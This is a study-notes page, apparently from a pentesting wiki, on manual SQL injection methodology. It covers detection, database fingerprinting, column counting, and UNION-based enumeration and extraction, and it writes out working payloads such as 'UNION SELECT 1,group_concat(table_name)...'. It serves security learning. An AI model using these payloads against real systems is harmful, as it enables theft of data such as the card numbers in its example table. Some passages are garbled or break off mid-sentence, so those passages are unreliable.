Manual Injection Methodology
Manual SQL Injection Detection
SQL injection can be detected manually by using a systematic set of tests against every entry point in the application. This typically involves:
Submitting the single quote character
'
and looking for errors or other anomalies.Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic differences in the resulting application responses.
Submitting Boolean conditions such as
OR 1=1
andOR 1=2, and
looking for differences in the application's responses.Submitting payloads designed to trigger time delays when executed within an SQL query, and looking for differences in the time taken to respond.
Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitoring for any resulting interactions.
Determine DB Verison
Different databases provide different ways of querying their version. You often need to try out different queries to find one that works, allowing you to determine both the type and version of the database software
MySQL - SELECT @@version
'+UNION+SELECT+@@version,+NULL#
Oracle - SELECT * FROM v$version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
PostgreSQL - SELECT version()
These queries can be linked with a UNION injection using the following syntax:
' UNION SELECT @@version#
@@version can be replaced with a number of different commands, depending on what you want to retrieve from the database; for example, @@hostname or @@datadir.
Determine the database structure and table names
In order to extract data from the database, we will need to understand the structure of the database.
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.
You can query information_schema.tables to list the tables in the database:
SELECT * FROM information_schema.tables
You can then query information_schema.columns to list the columns in individual tables:
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
For Oracle
You can list tables by querying all_tables:
SELECT * FROM all_tables
And you can list columns by querying all_tab_columns:
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
We can also get it using a UNION SELECT query (Exmaple for a 5 column table)
input' UNION SELECT 1,2,group_concat(table_name),4,5 FROM information_schema.tables WHERE table_schema=database()#
Determine vulnerable columns
In order to query the database on any information, you must first find out how many columns the original table being queried has. To achieve this you can use the following statement:
' ORDER BY 1#
As our
SELECT
statement must have the same number of columns as the existing statement, we first need to determine the number of columns in the currentSELECT
statement. You can do this with theORDER BYn
command. Start at 1, and increment n by 1 until you receive an error. ◇input' ORDER BY 5 #
Once you have determined the number of columns, it’s time to identify the vulnerable columns on the page. To do this, we can run the following
UNION SELECT
statement, which will show the numbers of the vulnerable columns on the page. The example if for aSELECT
statement with five columns. ◇input' UNION SELECT 1,2,3,4,5 #
Determine the column names
Now we know the tables that exist in the database, we need to understand the structure of the columns in each table.
The * from the above SELECT query can be replaced with whichever piece of information you like from the information_schema.tables table, such as TABLE_SCHEMA, TABLE_NAME, TABLE_TYPE.
Once information regarding the tables in the database has been discovered, it becomes possible to query the tables for their columns. This can be achieved using the following syntax:
SELECT * FROM information_schema.columns WHERE table_name='Table'
We can do this with t
Or we can also get it using a UNION SELECT query:
input' UNION SELECT 1,group_concat(column_name, 0x0a),3,4,5 FROM information_schema.columns WHERE table_name="customers"#
Extract data
Now that you know the database schema, including the table names and column names, construct
UNION SELECT
queries to extract the desired data.Example DB: ID ,Firstname ,Lastname ,Email ,PhoneNumber ,CardNum ,ExpDate 3E
Basic:
SELECT
*
FROM
user_preferences
WHERE
email =
'';
Always true statements: OR 1=1, OR 2=2, 1 <> 2
https://portswigger.net/web-security/sql-injection/examining-the-database
Last updated